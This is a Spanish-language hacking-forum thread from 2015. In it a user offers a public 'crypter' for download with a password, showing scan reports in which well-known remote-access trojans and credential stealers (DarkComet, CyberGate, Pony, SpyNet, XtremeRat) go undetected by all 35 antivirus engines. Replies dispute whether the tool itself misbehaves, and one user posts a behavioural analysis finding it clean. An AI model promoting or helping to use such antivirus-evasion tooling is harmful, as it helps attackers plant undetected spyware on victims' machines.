|
Título: Crypter Key Public ByRoda Publicado por: Roda en 29 Mayo 2015, 13:22 pm Les dejo esta lechuguita (http://i.imgur.com/z0MPYky.png) Test in (http://i.imgur.com/0BtPjW3.png) Funcional en (http://i.imgur.com/e8lm2gZ.gif) Russian! Windows Work! (http://i.imgur.com/RDfHs2q.gif) (http://i.imgur.com/OxvPQPF.gif) Reports Date and Time: 5/29/2015 11:08:02 UTC File Name: Bozooc.exe File Size: 57.19 KB MD5: b2a03f08d7edb6c0ce9f007f6ad66107 SHA1: 32432a4e39e312ea787b6e19b2436d31f6b74869 Detection: 0 of 35 (0%) Status: CLEAN AVG Free - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! FortiClient - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! Panda CommandLine - Clean! SUPERAntiSpyware - Clean! Twister Antivirus - Clean! VIPRE - Clean! Date and Time: 5/29/2015 11:08:19 UTC File Name: Cybergate con instalacion e inyeccion.exe File Size: 295.19 KB MD5: 0006cf931d43eb59fa2fe06f93677663 SHA1: f8954bc9766eddae1dc030c8aa176054a1669b5c Detection: 0 of 35 (0%) Status: CLEAN AVG Free - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! FortiClient - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! Panda CommandLine - Clean! SUPERAntiSpyware - Clean! Twister Antivirus - Clean! VIPRE - Clean! Date and Time: 5/29/2015 11:08:42 UTC File Name: DArkComet.exe File Size: 276.19 KB MD5: ad075ee13457899fffeb98c660c94bf1 SHA1: 49e34b0ac49aae12be2f5c8f7863f4651648820c Detection: 0 of 35 (0%) Status: CLEAN AVG Free - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! FortiClient - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! Panda CommandLine - Clean! SUPERAntiSpyware - Clean! Twister Antivirus - Clean! VIPRE - Clean! Date and Time: 5/29/2015 11:09:50 UTC File Name: IndetectablesRat+EOF.exe File Size: 454.24 KB MD5: 52837773aff708db0baa51db1125969f SHA1: 78634b269fe4e6f19dd3df835f2d561770149812 Detection: 0 of 35 (0%) Status: CLEAN AVG Free - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! FortiClient - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! Panda CommandLine - Clean! SUPERAntiSpyware - Clean! Twister Antivirus - Clean! VIPRE - Clean! Date and Time: 5/29/2015 11:10:11 UTC File Name: Pony.exe File Size: 115.19 KB MD5: 9cf3ddabfedc470846514642f7165e99 SHA1: e1992ed02033652f902fcbdd21360b73ba7bbad8 Detection: 0 of 35 (0%) Status: CLEAN AVG Free - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! FortiClient - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! Panda CommandLine - Clean! SUPERAntiSpyware - Clean! Twister Antivirus - Clean! VIPRE - Clean! Date and Time: 5/29/2015 11:10:11 UTC File Name: Pony.exe File Size: 115.19 KB MD5: 9cf3ddabfedc470846514642f7165e99 SHA1: e1992ed02033652f902fcbdd21360b73ba7bbad8 Detection: 0 of 35 (0%) Status: CLEAN AVG Free - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! FortiClient - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! Panda CommandLine - Clean! SUPERAntiSpyware - Clean! Twister Antivirus - Clean! VIPRE - Clean! Date and Time: 5/29/2015 11:12:30 UTC File Name: SpyNet.exe File Size: 493.19 KB MD5: 4a1613d808f92f870b6a67d42aa4ab1d SHA1: 932d0e8900b00b6c56ce81657f59801f18fedf88 Detection: 0 of 35 (0%) Status: CLEAN AVG Free - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! FortiClient - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! Panda CommandLine - Clean! SUPERAntiSpyware - Clean! Twister Antivirus - Clean! VIPRE - Clean! Date and Time: 5/29/2015 11:12:37 UTC File Name: XtremeRat 3.7.exe File Size: 45.69 KB MD5: e2666adf91a50c3ac3a18ad190a8c604 SHA1: 1f9ac9ecfd1f80e0ceb4863aafc07b28de324407 Detection: 0 of 35 (0%) Status: CLEAN AVG Free - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! FortiClient - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! Panda CommandLine - Clean! SUPERAntiSpyware - Clean! Twister Antivirus - Clean! VIPRE - Clean! Descarga http://www74.zippyshare.com/v/5IUGtsKo/file.html (http://www74.zippyshare.com/v/5IUGtsKo/file.html) Pass Octal/Pitbull (,,,,,,,,,,,,,f«zuhe,,,,,,,,,,,,,,,,, + wqwqwqwqwqwqw«ö¿À°qwqwqwqwqwqwqwqwq) Hasta la proxima! Título: Re: Crypter Key Public ByRoda Publicado por: scott_ en 30 Mayo 2015, 08:05 am Me has tocado por ultima vez los cojones, el exe en cuanto lo ejecute después de la cifrado mi computadora se puso loca.
Vaya que manera de joder. El proceso es anti-taskmanager cuando en realidad no se selecciona esa opción. Chequenlo ustedes mismos. Saludos. Título: Re: Crypter Key Public ByRoda Publicado por: Roda en 30 Mayo 2015, 08:20 am juazzz estas medio crazy scot
debe ser un problema de tu pc si usas spynet puede pasar Título: Re: Crypter Key Public ByRoda Publicado por: scott_ en 30 Mayo 2015, 08:21 am juazzz estas medio crazy scot debe ser un problema de tu pc si usas spynet puede pasar Tu crypter puede estar limpio, pero no me deja de saltar el avs. Ni uso spynet ni ningún rat, use el típico. Athena, y nunca me pasa eso, hasta que uso algún crypter de similitud. Realmente prefiero que los chicos de este foro lo usen en maquina vritual. Tal vez en indetectables pase, pero aquí me ocurrió eso. Saludos. Título: Re: Crypter Key Public ByRoda Publicado por: Roda en 30 Mayo 2015, 08:22 am pero porque publicas la pass?
eso no se hace scot no descargues mas y ya saltan pq esta quemadito Título: Re: Crypter Key Public ByRoda Publicado por: scott_ en 30 Mayo 2015, 08:24 am Borrada.
Se lo dejo al criterio de un moderador. Todos los crypters saltan, pero que salte después de haber borrado el crypter con el exe cifrado es bastante raro. Refud me dijo que esta limpio. 0/35 muy chulo, pero me importa mas la calidad. Saludos. Título: Re: Crypter Key Public ByRoda Publicado por: Roda en 30 Mayo 2015, 08:26 am scott que tu tengas una falla no significa que todos la tengan
decime que falla es a ver si logro darle Título: Re: Crypter Key Public ByRoda Publicado por: scott_ en 30 Mayo 2015, 08:29 am scott que tu tengas una falla no significa que todos la tengan decime que falla es a ver si logro darle Pues no pienso volver a abrirlo, estoy analizando mi equipo, observando rutas y buscando registros. Espero de mi parte que se un fallo del sistema, que dudo mucho, tengo bastantes crypters privados y públicos, justamente ahora me sucede esto. Si es un fallo mío, te pido disculpas, una sincera disculpa, pero hasta entonces espero respuesta de algún un moderador. Saludos. Título: Re: Crypter Key Public ByRoda Publicado por: Roda en 30 Mayo 2015, 08:30 am a que te referis con que el crypter salta?
juazz jamas oi eso SALTA? o sea se queda pegado? que rat usas? Título: Re: Crypter Key Public ByRoda Publicado por: Eleкtro en 30 Mayo 2015, 10:52 am He llevado a cabo una monitorización manual de la actividad del registro, de archivos, y de conexiones entrantes/salientes, y aparte un análisis online de esas 3 cosas también mediante el servicio de Anubis.
Ambos análisis no han encontrado nada sospechoso ni en roda.exe, cliente.exe, o el archivo cifrado que cliente.exe genera, según los resultados de mis análisis están todos limpios. Sobre el análisis manual... • Herramientas que he utilizado: Regshot 2 (no la versión 1.X obsoleta e inservible) Moo0 Filemonitor Crowd Inspect Process Monitor (de SysInternals) • Archivos analizados: roda.exe (stub) Claves de registro creadas: 0 Archivos creados: 0 Conexiones: 0 Cliente.exe Claves de registro creadas: 0 Archivos creados: 2 Conexiones: 0 RodaCripted.exe (el archivo protegido) Claves de registro creadas: 0 Archivos creados: 0 Conexiones: 0 Cómo vemos Cliente.exe es el único que tiene actividad en este sentido, el primer archivo se expande en la raíz "C:\" con nombre "AKIN.MSSTYLES", los archivos "MSSTYLES" son archivos de temas visuales de Windows, probablemente sea el Skin que Roda ha usado en su aplicación, ya que tras analizar dicho archivo en un editor de recursos he verificado que realmente se trata de un archivo "MSSTYLES" con sus tablas de recursos (y no un archivo cualquiera con la extensión suplantada), las OCX de Codejock para VB6 usan este tipo de archivos para aplicar los Skins. El segundo archivo es un archivo temporal binario con nombre aleatorio (un nombre único) tal que así "~DFBD260B7F9DB08975.TMP", este archivo se crea en la carpeta temporal de LocalAppData, pesa 48 kb y se crea durante el startup de la app, durante la inicialización de las OCX, por lo tanto no tenga que con el código fuente de Roda sino más bien con la carga del programa, al terminar la ejecución de la app este archivo se elimina automaticamente. Es un archivo binario, no he podido verificar la funcionalidad de este archivo, pero no se trata de un archivo executable. Sobre el análisis online... Lo cierto es que no sirve de mucho ya que en el server de Anubis le faltan algunas OCX requeridas para inicializar el programa Cliente.exe, por lo tanto me he visto obligado a realizar un análisis manual, pero bueno, aquí pueden ver los resultados parciales de los análisis: https://anubis.iseclab.org/?action=result&task_id=1a4d8ea1afe3c468401b29f619150f88a https://anubis.iseclab.org/?action=result&task_id=1bb5f7be637824014e9f1ed5639f06f98 La actividad de registro y de archivos que se puede ver es de lo más normal. Saludos! |